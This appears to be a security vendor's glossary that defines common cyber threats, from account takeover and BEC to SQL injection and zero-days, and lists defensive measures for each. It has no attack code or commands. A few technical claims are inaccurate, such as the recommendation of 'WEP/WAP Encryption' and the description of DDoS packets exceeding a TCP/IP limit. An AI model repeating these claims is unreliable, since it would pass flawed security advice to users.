Cyber Threats and Attacks: A Comprehensive List

Account Takeover (ATO)

Identity accounts are fundamental to controlling access to sensitive data, devices, and other IT resources. As a result, accounts are a focus of cyberattacks. A staggering 83% of businesses experience an account takeover attack. ATO attackers use various methods to hijack an account and gain unauthorized access. Methods include social engineering, phishing, Man-in-the-Middle (MitM) attacks, and credential stuffing. Protection measures include robust authentication and security awareness training.

API Gateway Hack

APIs (Application Programming Interfaces) connect services and applications together to add capabilities to a system. An API Gateway manages and protects APIs. As such, they are a central point of attack. API gateway attacks include exploitation of misconfigured gateway settings, Distributed Denial of Service (DDoS) attacks, and unauthorized access to the gateway. Protection measures include robust authentication and authorization, along with least privilege access management, enforcement of secure configurations, and cybersecurity awareness training for IT staff, as well as rate-limiting controls to prevent DDoS attacks.

Botnets

Certain types of malware are used to infect distributed devices, such as computers and other internet-connected devices, to form a botnet. The botnet is centrally controlled by a cybercriminal or "Botnet Herder" using a Command and Control (C&C) center. Phishing is a typical method used to infect machines with Botnet malware. Once a cybercriminal gains control of a machine, it can then be used to carry out DDoS attacks, distribute spam, and steal employee credentials. Security measures to prevent botnet attacks include dark web monitoring, robust authentication, and a VPN (Virtual Private Network) for remote employees.

Business Email Compromise (BEC)

The FBI described BEC as "one of the most financially damaging online crimes". BEC scammers rely on techniques such as social engineering and ATO. Once the attackers have control of email accounts, they can build trusted relationships with finance department employees. These trusted relationships are exploited to manipulate staff into transferring money to a threat actor, who presents themselves as a legitimate business partner or similar. Recent BEC scams include the use of deepfakes to impersonate C-level executives. Security measures to prevent BEC scams include implementing robust processes to verify transactions, enforcing robust access management, and providing security awareness training.

Credential Stuffing

Stolen credentials are sold on the dark web. These login credentials are then used in credential stuffing attacks to gain unauthorized access to accounts. Credential stuffing uses automation to test credentials against multiple online accounts. Measures used to prevent credential stuffing include dark web monitoring, robust authentication, including multi-factor authentication (MFA), and biometric passwordless authentication (FIDO).

Cross-Site Scripting (XSS)

XSS attackers use code injection of malicious scripts on vulnerable websites. XSS attacks can lead to account compromise, data theft, and privilege escalation. The latter can lead to ransomware attacks and other damaging cyberattacks. Cross-Site Scripting can be prevented by ensuring websites are configured securely, deploying Web Application Firewalls (WAFs), and using a CSP (Content Security Policy) to ensure that only scripts from the same domain or other allowed sources are allowed to run.

Cryptojacking

Cryptojacking gained popularity as the price of cryptocurrencies soared in the late 2010s. Cryptjacking involves using malware to mine cryptocurrency using infected devices. The cryptojacking malware is often distributed via the software distribution supply chain or via vulnerable cloud instances. Once infected, computers become very slow, impacting productivity. Companies may also find themselves legally liable. Measures to prevent cryptojacking include security awareness training, anti-malware, and security patching.

Cyberattack

A cyberattack is a word used to describe a myriad of different forms of threats that result in security incidents. Cyberattacks are prolific, sophisticated, and costly. AI is driving even more complex cyberattacks that can be challenging to prevent. The security industry is pushing back by providing deep insights via dark web monitoring into the realm of the cybercriminal - the dark web. AI-driven antivirus solutions, WAFs, and security awareness training all help to prevent cyberattacks. The use of identity access management to enforce robust authentication and manage privileges is a fundamental layer of security that helps prevent cyberattacks.

Data Breaches

Data is valuable, which makes it a target for cybercriminals. Data includes sensitive customer information, personal health information (PHI), company secrets, financial information, and login credentials. Data breaches can cost a company financially, damage its reputation, lead to customer losses, and result in non-compliance fines. There are many ways that data breaches occur, but fundamental security measures that help prevent them include robust identity management and least privilege access controls, dark web monitoring to identify stolen data, and security awareness training to prevent phishing.

Data Exfiltration

When data is deliberately and without authorization removed from corporate computing systems, it is said to be exfiltrated. Data exfiltration can be manual or automated. Often, data is stolen over extended periods, and the company remains unaware of its data being exfiltrated. Malware, such as keyloggers, is used to steal the data and send it back to a cybercriminal. Data exfiltration can be prevented using Next-gen antivirus software (NGAV), dark web monitoring, identity management, and least privilege access control.

DDoS Attack

DDoS attacks are Distributed Denial of Service (DDoS) attacks that primarily target websites and other web-based components. During the attack, hundreds of thousands of devices, including laptops, desktop computers, routers, and IoT devices, are infected with botnet malware used to carry out DDoS attacks. The cybercriminals behind a DDoS attack use centralized command and control to direct and control the botnet. The infected devices send out massive volumes of data packets above the maximum allowed limit by TCP/IP to overwhelm servers and websites. DDoS attacks can be prevented using Anti-DDoS tools, vulnerability patching, Cyber Awareness Training, and WAFs.

Deepfake Attacks

Deepfakes are using a type of AI known as deep learning. The deepfake is used to create realistic-looking fake media. Deepfakes are used to manipulate and scam people using social engineering. An iProov report found a 704% increase in "Face Swap" deepfake attacks. Deepfakes can be challenging to detect and prevent. However, security measures that help mitigate deepfake attacks are using cross-checks and verification processes, and robust identity management and verification systems. Security vendors are starting to offer comprehensive anti-deepfake solutions.

Doxxing

Doxxing refers to the malicious exposure of sensitive or personal information in digital channels, such as social media. The goal of doxxing is to harass, shame, or extort a victim. Companies that experience doxxing of employees can have their reputation damaged, see employee data stolen, and suffer from non-compliance with data protection regulations. Doxxing can be prevented using security awareness training, robust access management, and dark web monitoring.

Eavesdropping Attacks

Eavesdropping can be as simple as listening in on conversations or intercepting private communications by digital means. It can lead to financial theft and fraud, company secret theft, and stolen data. Eavesdropping attackers use various methods to intercept sensitive communications. Preventing eavesdropping requires a multi-layered security approach that includes network monitoring, end-to-end encryption, network segmentation, and security awareness training.

GitHub Leaks

GitHub is a popular repository for data and software code. GitHub has 212 million users and 253 million public repositories (or "repos"). As a popular store of sensitive information, GitHub is a target for cyberattackers. Vulnerabilities in the repository, misconfiguration of GitHub settings, and malicious repos can all cause GitHub leaks. Preventing GitHub leaks requires cybersecurity training for IT staff, regular repository auditing, secure configuration settings, and robust access management and authentication for repositories.

Insider Threat

Identifying threats from insiders, including employees, contractors, and supply chain partners, is challenging. However, these threats from trusted entities are common. A report on Insider Threats found that 83% of companies had at least one security incident caused by an insider. Insider threats result in leaked corporate secrets and IP loss, credential theft, and fraud. Insider threats are challenging to detect and prevent. However, mitigation of insider-based attacks can be achieved using security measures such as User Behavior Analytics (UBA), dark web monitoring, Privileged Access Management (PAM), and Data Leak Prevention (DLP).

Identity Theft

Digital identities are used to access online accounts, networks, devices, data, apps, and other computing resources. As such, a digital identity is valuable to cybercriminals. Identity theft affects individuals and companies. If a business account is hijacked, the identifying information held in the account is at risk. This data can include the company's credentials, such as tax identification number, business license, and credit details. Stolen identities can be used to obtain goods, services, or credit, and the cybercriminal uses the digital identity to commit fraud. The hacker may also sell the stolen digital identities on the Dark Web to other fraudsters. Javelin Strategy & Research found that identity fraud costs US businesses $23 billion. Security measures used to mitigate identity theft include robust authentication, including biometric passwordless, and security awareness training.

Keylogger

A keylogger is a type of malware that, once installed on a device, captures keystrokes, such as login credentials, and sends the data to a cybercriminal. Keyloggers can cause identity theft, data breaches, and open the door via stolen credentials to ransomware infections and BEC scams. Keylogger infections can be prevented by using next-generation antivirus software (NGAV), implementing security awareness training, and utilizing AI-driven email filters.

Malware & Spyware

Malware is malicious software used to cause harm to computing resources or exploit an individual or business. Spyware is a type of malware that collects sensitive data and sends it to an attacker. Other types of malware include ransomware, banking trojans, botnets, cryptojackers, and adware. Malware can be challenging to prevent, as new forms that evade detection by conventional antivirus solutions are proliferating. However, next-gen antivirus software (NGAV) helps to detect these evasive strains. Other measures that can prevent malware infections include security awareness training and anti-phishing tools.

Man-in-the-Middle Attacks (MitM)

A MitM attack is a method used to intercept an online communication, such as an email message. Login credentials are a target for MitM attacks; if credentials are submitted unprotected, they could be intercepted and stolen. MitM attacks can result in ATO, ransomware infection, IP and company secrets theft, and fraud. MitM attacks can be prevented using a layered security approach that includes end-to-end encryption of data transmissions, WEP/WAP Encryption on Access Points, multi-factor authentication (MFA), dark web monitoring, and robust access management.

MFA Bypass

Multi-factor authentication (MFA) is used as a layer of security that helps protect access to accounts and sensitive information. However, in recent years, cybercriminals have developed methods to bypass this layer of security. Techniques to bypass multi-factor authentication include social engineering, such as tricking someone into believing they are dealing with IT support, stealing login codes as they are generated (session hijacking), and SIM hacking. MFA is still an important security layer, and bypass attacks can be mitigated by using security awareness training and biometric passwordless authentication.

Passwords

Passwords are the most common method to control access. They are easy to use and implement. However, passwords are also plagued by security issues, including password fatigue, reuse across multiple apps and devices, and phishing. Passwords are being replaced by phishing-resistant MFA and biometric passwordless authentication.

Pharming Attack

The Domain Name System (DNS) is often thought of as the "phonebook of the internet"; the DNS translates human-readable website names into machine-readable ones, routing the user to the correct site. Pharming is a common type of DNS attack that manipulates the DNS so that when someone enters the name of a website in their browser, the DNS redirects them to a malicious site instead. This site is then often used to steal sensitive data, including login credentials. Pharming prevention requires securing the DNS and keeping software and systems patched and updated.

Phishing

Phishing is used to steal data, such as login credentials. It is human-centered, utilizing psychology to manipulate employees and others into performing actions that lead to data theft and other cyberattacks. This action typically tricks the victim into clicking a malicious link that directs them to a malicious website. Phishing utilizes various communication channels to deliver its attack. Channels include email, SMS text messages (Smishing), voice calls (Vishing), and social media posts. Phishing prevention encompasses security awareness training, phishing simulation exercises, and anti-phishing tools, including email filters.

Ransomware

Ransomware is a type of malware that is used to extort money from a victim organization. It typically works by encrypting all files and documents across a network, connected devices, and cloud repositories. Modern ransomware usually also steals the data and holds it as ransom leverage, threatening to release it for sale on the dark web. Ransomware infections occur via various mechanisms, including phishing and misconfiguration of cloud apps. Layered security measures are needed to prevent ransomware infection. These measures should include security awareness training, robust access and authentication controls, dark web monitoring, secure anti-ransomware backups, Endpoint Detection and Response (EDR) solutions, and anti-malware.

Rootkit

A rootkit is a set of malicious tools (malware) used to gain unauthorized control of a device. Malware typically infects devices via phishing or software and API vulnerabilities. Once installed, the rootkit malware performs malicious actions and sends data back to the hacker via a command and control (C&C) channel. Rootkit malware is difficult to detect using conventional antivirus (AV) measures. Best practice measures used to prevent a rootkit infection include Next-gen antivirus software (NGAV).

Session Hijacking

When a cybercriminal intercepts the interactions between a user and a web app to take control, the tactic is known as session hijacking. Once the attacker has control, they are authenticated, allowing them to use the session to steal data, bypass MFA, commit identity theft and ATO attacks, access bank accounts, and so on. Session hijacking can be prevented by ensuring that the Internet Protocol TLS (Transport Layer Security) protocol is correctly implemented. Other measures include robust session management and secure cookies and session IDs.

Smishing

Smishing or SMS text phishing, is a type of phishing. The hackers send out phishing messages to a victim, manipulating them into clicking a link or calling a malicious phone number. Cybercriminals find phone numbers to target on the dark web. The result of smishing includes stolen login credentials and financial scams. Prevention includes security awareness training, anti-phishing tools that block access to malicious websites, and MFA or biometric passwordless authentication.

Social Engineering

Many cyberattacks employ an element of social engineering, which involves manipulating natural human behavior. Social engineering, for example, was used to trick help desk operators into handing over access to accounts by exploiting password resets. Once access was gained, the attackers could escalate privileges, allowing them to install ransomware on the networks of various UK retailers. Social engineering attacks can be mitigated by training employees and technical staff on tricks used to manipulate their behavior. Other measures, such as multi-factor authentication and passwordless authentication, as well as next-generation antivirus (NGAV), can help mitigate the impact of social engineering.

Spoofing

Spoofing is a type of cyber-deception used to trick organizations into handing over large sums of money and sensitive data. Like phishing, spoofing exploits trusted relationships. For example, spoofing may involve impersonating a trusted person, such as a CEO, to manipulate the target into performing an action that benefits the attacker. Business Email Compromise (BEC) is a type of spoofing. Social engineering is the driver of spoofing, which can result in stolen credentials, ATO, financial fraud, and malware infections. Mitigation of spoofing involves security awareness training, process cross-checks, incident reporting, and AI-powered anti-phishing solutions.

SQL Injection Attacks (SQLi)

SQL statements are used to perform legitimate database tasks. During a SQL Injection attack, a SQL statement is exploited to allow cybercriminals to perform database tasks such as updating or retrieving data. SQLi attacks can be prevented by sanitizing and validating SQL inputs, using least privilege access controls to database access, and implementing a web application firewall.

TrickBot

TrickBot is a type of malware that is designed to evolve constantly. Malware developers can utilize the specialized architecture of TrickBot to add new capabilities, such as scanning for open ports. TrickBot malware is usually delivered using phishing. TrickBot malware leads to credential and data theft, installation of backdoors to allow network access, and ransomware attacks. This malware is challenging to detect. Best practice security measures include next-generation antivirus (NGAV) solutions, as well as network scanning and security awareness training, which can help prevent infections.

Vishing Attacks

Vishing, also known as voice phishing, is a type of phishing that utilizes phone calls to deceive individuals into disclosing sensitive and financial information. It is a form of impersonation attack that uses methods, including ID spoofing and deepfakes. Highly targeted vishing campaigns utilize the dark web to gather intelligence on their targets. Social engineering tactics, such as behavior manipulation, underpin vishing. Best practices to mitigate vishing attacks include security awareness training, dark web monitoring, and regular process checks.

Whaling

Whaling attacks target senior-level executives and managers in an attempt to exploit a company. Whaling attacks are highly targeted, and the cybercriminals often use the dark web to gather intelligence on the victim. Attackers focus on sensitive information and critical data, including financial data. Whaling attacks use social engineering to manipulate and deceive their high-level targets to transfer large sums of money to a hacker's bank account, access sensitive corporate data and IP, and manipulate corporate policies to cause harm to a company. Whaling can be prevented through security awareness training of senior management and board members, dark web monitoring, and robust access management.

Zero-Day Vulnerability

Vulnerabilities are flaws in software, firmware, hardware, or processes. Often, vulnerabilities are discovered during testing or after release, but are then quickly addressed. However, some vulnerabilities remain unidentified and open to exploitation. These types of flaws are zero-day vulnerabilities, i.e., the vendor has had 0 days to fix the flaw before an attacker can exploit it. Zero-day vulnerabilities are exploited in various types of cyberattacks, including ransomware, data breaches, and fraud. Mitigation of zero-day flaws requires multiple layers of security, including encryption, robust identity and access management, regular software and system patching, network monitoring, and dark web monitoring.

The above list of cyberattack types is not exhaustive. Cybercriminals continually look for new ways to exploit and harm individuals and businesses. The advent of AI-driven cybercrime is creating challenges in the detection and prevention of sophisticated cyberattacks that involve LLMs and deepfakes. However, security vendors are pushing back with AI-driven and effective solutions. With the average cost of a data breach hitting $4.44 million, cyberattack resilience is essential for any business. Ultimately, there is no one solution that fits all cyberattack scenarios. Instead, an organization must use a multi-layered, defense-in-depth approach to securing its people, network, and processes.